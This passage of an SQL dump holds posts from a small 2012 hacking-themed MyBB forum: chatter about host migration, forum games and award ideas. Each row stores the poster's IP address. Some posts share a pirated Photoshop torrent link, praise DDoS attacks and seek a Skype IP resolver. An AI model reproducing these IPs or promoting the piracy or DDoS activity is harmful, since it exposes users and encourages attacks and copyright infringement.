Section', '0', '1', 't3h jok3r', '1345820324', 'Thanks for understanding, I will add the section but in a few weeks.', '41.151.195.186', '697811898', '1', '0', '0', '0', '1', '84442c06cc6ea7ec9e4f01f6d08f6abe', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('760', '201', '757', '42', 'RE: Lance armstrong stripped of 7 tour titles?', '0', '82', 'iTzIpod', '1345820478', '[quote=\'t3h jok3r\' pid=\'757\' dateline=\'1345819163\'] Too much to read but I got the Idea. I\'m sure 90% athletes do drugs (Ex: Steroids) or some other kind to get more energy to cheat. [/quote] Agreed. All I wanna know is how they don\'t get caught :3', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '33eded5e295fe16430612178c0478cd7', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('761', '78', '187', '7', 'RE: Dota 2 beta keys giveawat!', '0', '82', 'iTzIpod', '1345820653', '[url=http://en.wikipedia.org/wiki/Dota_2] Dota 2 Wiki[/url] It takes like 5 seconds just to open up a new tab and Google search \"Dota 2\"', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '910a54ea5ad5787cd1d3749bc8194f14', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('762', '196', '703', '3', 'RE: IMPORTANT ANNOUNCEMENT!!!', '0', '82', 'iTzIpod', '1345821490', '[quote=\'t3h jok3r\' pid=\'703\' dateline=\'1345768309\'] [quote=\'iTzIpod\' pid=\'701\' dateline=\'1345767787\'] [quote=\'t3h jok3r\' pid=\'699\' dateline=\'1345767008\'] [quote=\'iTzIpod\' pid=\'698\' dateline=\'1345766825\'] @NXK, yeah.. I could barely access the forum at like 10:00 PM - 12:00 AM.. [/quote] Not just that. LH loses members and posts, it\'s frustrating especially for me when I\'m adding something and the server goes down. Plus if Google or any other bot/spider caches a down page, it\'s bad SEO. [/quote] True. But hopefully this new host migration will have better host than this current one. By the way may I ask which host we are currently using? [/quote] Sorry I can not say what host we are currently on due to some security reasons. But after the migrating I will surely let you know, my hosting I\'m on now is fairly new and kinda cheap but our new host has been out there for 3+ years with good reviews. [/quote] Oh. Alright :) What about this new host? :3', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '7f8b047c2f1b72675110c909e13bbd13', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('763', '43', '627', '7', 'RE: How did you find us?', '0', '1', 't3h jok3r', '1345821692', '[quote=\'iTzIpod\' pid=\'627\' dateline=\'1345668585\'] What? What do you mean took my username? :o [/quote] You said \"I\'m from t3h jok3r\"', '41.151.195.186', '697811898', '1', '0', '0', '0', '1', '001381d656c4931f77ee2470120bbdb3', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('764', '187', '684', '3', 'RE: Public Downloads?', '0', '82', 'iTzIpod', '1345821801', '[quote=\'t3h jok3r\' pid=\'684\' dateline=\'1345758374\'] I actually agree with R?????zo? and iTzIpod. We currently need activity and need some bumps on good giveaways and tutorials as well. [/quote] So are you going to deny or accept this suggestion?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'cc085b9b95a91f33c3504e57df90cd5c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('766', '196', '762', '3', 'RE: IMPORTANT ANNOUNCEMENT!!!', '0', '1', 't3h jok3r', '1345822280', '[quote=\'iTzIpod\' pid=\'762\' dateline=\'1345821490\'] [quote=\'t3h jok3r\' pid=\'703\' dateline=\'1345768309\'] [quote=\'iTzIpod\' pid=\'701\' dateline=\'1345767787\'] [quote=\'t3h jok3r\' pid=\'699\' dateline=\'1345767008\'] [quote=\'iTzIpod\' pid=\'698\' dateline=\'1345766825\'] @NXK, yeah.. I could barely access the forum at like 10:00 PM - 12:00 AM.. [/quote] Not just that. LH loses members and posts, it\'s frustrating especially for me when I\'m adding something and the server goes down. Plus if Google or any other bot/spider caches a down page, it\'s bad SEO. [/quote] True. But hopefully this new host migration will have better host than this current one. By the way may I ask which host we are currently using? [/quote] Sorry I can not say what host we are currently on due to some security reasons. But after the migrating I will surely let you know, my hosting I\'m on now is fairly new and kinda cheap but our new host has been out there for 3+ years with good reviews. [/quote] Oh. Alright :) What about this new host? :3 [/quote] Umm, it\'s fast and we will migrate before Saturday.', '41.151.195.186', '697811898', '1', '0', '0', '0', '1', '48d0655126b75658ef6825b7649ba098', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('767', '196', '766', '3', 'RE: IMPORTANT ANNOUNCEMENT!!!', '0', '82', 'iTzIpod', '1345822689', '[quote=\'t3h jok3r\' pid=\'766\' dateline=\'1345822280\'] [quote=\'iTzIpod\' pid=\'762\' dateline=\'1345821490\'] [quote=\'t3h jok3r\' pid=\'703\' dateline=\'1345768309\'] [quote=\'iTzIpod\' pid=\'701\' dateline=\'1345767787\'] [quote=\'t3h jok3r\' pid=\'699\' dateline=\'1345767008\'] Not just that. LH loses members and posts, it\'s frustrating especially for me when I\'m adding something and the server goes down. Plus if Google or any other bot/spider caches a down page, it\'s bad SEO. [/quote] True. But hopefully this new host migration will have better host than this current one. By the way may I ask which host we are currently using? [/quote] Sorry I can not say what host we are currently on due to some security reasons. But after the migrating I will surely let you know, my hosting I\'m on now is fairly new and kinda cheap but our new host has been out there for 3+ years with good reviews. [/quote] Oh. Alright :) What about this new host? :3 [/quote] Umm, it\'s fast and we will migrate before Saturday. [/quote] Can you tell me what host we are going to use? Or is that a no no?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'c077fa8016c216a28785fbb5473cb711', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('768', '43', '763', '7', 'RE: How did you find us?', '0', '82', 'iTzIpod', '1345822951', '[quote=\'t3h jok3r\' pid=\'763\' dateline=\'1345821692\'] [quote=\'iTzIpod\' pid=\'627\' dateline=\'1345668585\'] What? What do you mean took my username? :o [/quote] You said \"I\'m from t3h jok3r\" [/quote] Oh. I meant it as in you referred me :3 Since I came from TP. And your username is L33t Hacking on TP.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '0779da38edbe8d87702589059591d368', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('769', '206', '0', '7', 'Apply for SWAG', '0', '67', 'HoverCatz', '1345823845', 'Yo, this is me behind my mask; [img]https://dl.dropbox.com/u/33062220/snapshot.jpg[/img] Looks better with a Black hoodie', '85.165.36.95', '1436886111', '1', '0', '67', '1345823884', '1', '8db363631c9dbd0ea2bbc0e9127e3384', '0', '1345823884'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('770', '206', '769', '7', 'RE: Apply for SWAG', '0', '82', 'iTzIpod', '1345824220', 'Nice mask. Why are you holding a piece of paper with the number 67? :o In the shape of a diamond I guess :p SWAG', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '444f1b0fdb755c0c08eb2509d55eeff3', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('771', '206', '769', '7', 'RE: Apply for SWAG', '0', '67', 'HoverCatz', '1345824278', 'Its my UID :)', '85.165.36.95', '1436886111', '1', '0', '0', '0', '1', '69fc0d3f4d42107c71fce4e51a913b65', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('772', '206', '771', '7', 'RE: Apply for SWAG', '0', '82', 'iTzIpod', '1345824329', '[quote=\'HoverCatz\' pid=\'771\' dateline=\'1345824278\'] Its my UID :) [/quote] Oh. I didn\'t realize that :p', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'cda3f00e455bdccbba9f7efbb22755bf', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('773', '197', '696', '56', 'RE: /me Thread', '0', '67', 'HoverCatz', '1345825312', '/me is an awesome Java coder!', '85.165.36.95', '1436886111', '1', '0', '0', '0', '1', '8a9c83adac782e4a93aba7458824511c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('774', '200', '723', '55', 'RE: [Request] Adobe Photoshop CS6 Portable', '0', '2', 'Apathy', '1345825644', 'Torrent his: magnet:?xt=urn:btih:1F70593D167F733FFB3093673EE86E850525FAB0&dn=Adobe%20Photoshop%20CS6%2013.0%20Multilingual%20%28Portable%29&tr=udp%3a//tracker.openbittorrent.com%3a80 It is working and is cs6 portable. Seems clean but runs amazingly in sandboxie.', '70.53.236.250', '1177939194', '0', '0', '0', '0', '1', '787193ad1e01e248d42bdbc0385e9764', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('775', '197', '696', '56', 'RE: /me Thread', '0', '2', 'Apathy', '1345825750', '/me is the best admin right.....', '70.53.236.250', '1177939194', '0', '0', '2', '1345825760', '1', 'db115da38e8f4976076b742594e1b763', '0', '1345825760'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('776', '207', '0', '3', 'Suggest awards and apply for awards', '0', '2', 'Apathy', '1345825880', 'Well guys we like knowing what the community wants so suggest away for awards that should be added. Also if you think you deserve a award post here explaining why. GOGOGOGO:cool:', '70.53.236.250', '1177939194', '0', '0', '1', '1345936555', '1', '965684874a399a653721fdb7672488c4', '0', '1345936555'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('777', '187', '640', '3', 'RE: Public Downloads?', '0', '2', 'Apathy', '1345826015', 'I think maybe a post to see download link option, so it does not have to be used but can be used at the discretion of the user.', '70.53.236.250', '1177939194', '0', '0', '0', '0', '1', 'e1386b37f3c399033e831ccc4eef3b8d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('778', '205', '743', '53', 'RE: First Java Multiplayer \"Game\"', '0', '2', 'Apathy', '1345826081', 'Looks nice have not downloaded it though. What do you do in it...', '70.53.236.250', '1177939194', '0', '0', '0', '0', '1', 'c217bdfe571ecf535b8e04dee4ff286a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('779', '43', '105', '7', 'RE: How did you find us?', '0', '2', 'Apathy', '1345826158', 'I helped start it with you... :P', '70.53.236.250', '1177939194', '0', '0', '0', '0', '1', 'c360accb1d593e6cc4af408efe4a7565', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('780', '197', '696', '56', 'RE: /me Thread', '0', '82', 'iTzIpod', '1345827302', '/me is currently playing a RSPS.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '003436e800ef5db9588c5bc37ca7bc3f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('781', '207', '776', '3', 'RE: Suggest awards and apply for awads.', '0', '82', 'iTzIpod', '1345827486', 'Award Name: Newbie Hacker Award Description: This award is very prestigious to Newbies. How to obtain award: Have a total of 1 day time spent online! Award Icon: [img]http://img545.imageshack.us/img545/7172/premiumuse1.png[/img] Resize it and make it transparent if you want. Something like that', '24.212.197.164', '416597412', '1', '0', '82', '1345849151', '1', '9c36cb5cbcf37476627e1d68885a6883', '0', '1345849151'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('782', '202', '728', '25', 'RE: Virus Removal Guide! Pictures and step by step you can\'t fail!', '0', '54', 'Sin Cara', '1345828423', 'Thanks for the comments ;)', '173.245.53.157', '-1376438883', '1', '0', '0', '0', '1', 'bce684a61ae9267672d5586991a31537', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('783', '197', '696', '56', 'RE: /me Thread', '0', '67', 'HoverCatz', '1345829476', '/me is wondering what rsps iTzIpod is playing', '85.165.36.95', '1436886111', '1', '0', '0', '0', '1', '24baefac6a98e7683fd281a97145d190', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('784', '201', '760', '42', 'RE: Lance armstrong stripped of 7 tour titles?', '0', '61', 'NXK', '1345829671', '[quote=\'iTzIpod\' pid=\'760\' dateline=\'1345820478\'] [quote=\'t3h jok3r\' pid=\'757\' dateline=\'1345819163\'] Too much to read but I got the Idea. I\'m sure 90% athletes do drugs (Ex: Steroids) or some other kind to get more energy to cheat. [/quote] Agreed. All I wanna know is how they don\'t get caught :3 [/quote] Certain steroids can be flushed from your system fast, It just depends how fast the athlete needs them out of his system. it just depends what kind of steroid they\'re using.', '99.253.65.17', '1677541649', '0', '0', '61', '1345831747', '1', '033904ef5e2d304a6c84d1b9803b29a6', '0', '1345831747'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('785', '187', '640', '3', 'RE: Public Downloads?', '0', '61', 'NXK', '1345830030', 'I think JakeUS has the best idea, They have to post something with over 20 charecters in order to see the download link.', '99.253.65.17', '1677541649', '0', '0', '0', '0', '1', '19b83761a7cf57b51f15e11302bf2a93', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('786', '104', '251', '33', 'RE: Photoshop vs Gimp', '0', '20', 'JakeUS', '1345830603', 'Photoshop is definatly better.', '24.59.243.229', '406582245', '1', '0', '0', '0', '1', 'feddce1a3f010cc34809eb76e1e99c6f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('787', '197', '783', '56', 'RE: /me Thread', '0', '82', 'iTzIpod', '1345831283', '[quote=\'HoverCatz\' pid=\'783\' dateline=\'1345829476\'] * HoverCatz is wondering what rsps iTzIpod is playing [/quote] /me is playing le [url=http://www.deznation.ca]DezNation RSPS[/url] =] It is my friend\'s RSPS. Some minor bugs. But still an awesome server. (Click on DezNation RSPS)', '24.212.197.164', '416597412', '1', '0', '82', '1345831332', '1', '56ca37a24b0a3511d14b8ad783e41553', '0', '1345831332'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('788', '208', '0', '7', 'I m feeling happy ;)', '0', '54', 'Sin Cara', '1345831427', 'I m feeling very happy because i just left Hackforums and started my work here. Its really awesome forum. Best of luck for this forum;) Regards Sin Cara', '119.154.24.194', '2006587586', '1', '0', '0', '0', '1', 'aad0bbc9b005ed9366d5539aff7eb0b5', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('789', '201', '784', '42', 'RE: Lance armstrong stripped of 7 tour titles?', '0', '82', 'iTzIpod', '1345831436', '[quote=\'NXK\' pid=\'784\' dateline=\'1345829671\'] [quote=\'iTzIpod\' pid=\'760\' dateline=\'1345820478\'] [quote=\'t3h jok3r\' pid=\'757\' dateline=\'1345819163\'] Too much to read but I got the Idea. I\'m sure 90% athletes do drugs (Ex: Steroids) or some other kind to get more energy to cheat. [/quote] Agreed. All I wanna know is how they don\'t get caught :3 [/quote] Certain steroids can be flushed from your system fast, It just depends how fast the athlete needs them out of his system. it just depends what kind of steroid the\'re using. [/quote] Oh. I didn\'t know that. :o', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '16b759569484620a1188ba105bdf32b6', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('790', '197', '696', '56', 'RE: /me Thread', '0', '53', 'sirchamp', '1345831543', '/me thinks this is a spam thread', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', '07842525e648323d7cd6647547776e27', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('791', '205', '778', '53', 'RE: First Java Multiplayer \"Game\"', '0', '67', 'HoverCatz', '1345833072', '[quote=\'Apathy\' pid=\'778\' dateline=\'1345826081\'] Looks nice have not downloaded it though. What do you do in it... [/quote] [quote] only Movement works [/quote] Its still under development', '85.165.36.95', '1436886111', '1', '0', '0', '0', '1', 'b798b6e5e163fa65f288c29f8601f090', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('792', '204', '741', '29', 'RE: [FREE]Skype Resolver API', '0', '62', 'R?????zo?', '1345833868', 'I\'d love this, can I get it. Thanks in advance.', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', 'f1ef193f0b3183ffaf302d5746cb4baa', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('793', '204', '741', '29', 'RE: [FREE]Skype Resolver API', '0', '67', 'HoverCatz', '1345835031', 'API Is down now O.o \"fuck No Posting Private Shit of mine - Blic API BANNED - Arron XR\"', '85.165.36.95', '1436886111', '1', '0', '0', '0', '1', 'ac46ab3ab3acea29ec1caf022d9406c9', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('794', '208', '788', '7', 'RE: I m feeling happy ;)', '0', '82', 'iTzIpod', '1345836146', 'Your post is censored .', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '89783dc9bc285b1e3a583a13056d0ac9', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('795', '197', '696', '56', 'RE: /me Thread', '0', '82', 'iTzIpod', '1345836210', '/me corrects sirchamp by explaining to him it is a Forum Game.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '25b40a0a3f9c81afe870744eb074ebe3', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('796', '197', '696', '56', 'RE: /me Thread', '0', '53', 'sirchamp', '1345838234', '/me wants to say sorry because sirchamp didnt realize it is a forum game', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', 'f2cf1c4fce3edee946e0034eba2af405', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('797', '197', '696', '56', 'RE: /me Thread', '0', '67', 'HoverCatz', '1345845701', '/me feels funny :3', '85.165.36.95', '1436886111', '1', '0', '0', '0', '1', 'db3fed2c30139d0d6c1e5938f2cb2ad8', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('798', '179', '593', '34', 'RE: [tut] Multiple 3D text tutorials', '0', '67', 'HoverCatz', '1345845786', 'Thanks :D Nice release :3', '85.165.36.95', '1436886111', '1', '0', '0', '0', '1', 'a12d47bb6d2bf17d58e104e7a4452327', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('799', '197', '696', '56', 'RE: /me Thread', '0', '55', 'Baws', '1345845907', '/me is Baws the Baws. /me is botting on runescape.', '98.176.49.100', '1655714148', '0', '0', '0', '0', '1', 'f28e149736f740bf1bac65818f6b157f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('800', '43', '105', '7', 'RE: How did you find us?', '0', '55', 'Baws', '1345846136', 'I saw on another forum and I got here. :)', '98.176.49.100', '1655714148', '0', '0', '0', '0', '1', 'dd8d6b64371a32b8d438b0af93acd17a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('801', '187', '640', '3', 'RE: Public Downloads?', '0', '55', 'Baws', '1345846201', 'Like have been suggested, you should do a plugin that is \"post in thread to unlock file\"', '98.176.49.100', '1655714148', '0', '0', '0', '0', '1', 'bf4be29b231ae1e9b5489a1420aa1362', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('802', '181', '605', '54', 'RE: Fresh 22 Aug HoT [ Brazzers / Mofos / Xhamster / Youjizz .... MorE ] HoT', '0', '55', 'Baws', '1345846258', 'This will come in handy, you naughty admin.', '98.176.49.100', '1655714148', '0', '0', '0', '0', '1', '11c8030f353490bb47f4dacf755ad3ab', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('803', '207', '776', '3', 'RE: Suggest awards and apply for awads.', '0', '67', 'HoverCatz', '1345846775', 'Award Name: Cyber Warrior Award Description: For those with a powerful DDoSer How to obtain award: Prove to Joker that you can hit down Big stuff Image: http://www.veryicon.com/icon/png/Holiday/Christmas%203/star.png (Resize it)', '85.165.36.95', '1436886111', '1', '0', '0', '0', '1', '0cc956a3c6439b618d7f1173ceabfe8d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('804', '197', '696', '56', 'RE: /me Thread', '0', '1', 't3h jok3r', '1345847529', '/me I think I\'m doing this right this time.', '41.174.60.179', '699284659', '1', '0', '0', '0', '1', 'c91ed34788d7bb333f49f7d553d8f30c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('805', '206', '769', '7', 'RE: Apply for SWAG', '0', '1', 't3h jok3r', '1345847642', 'Nice 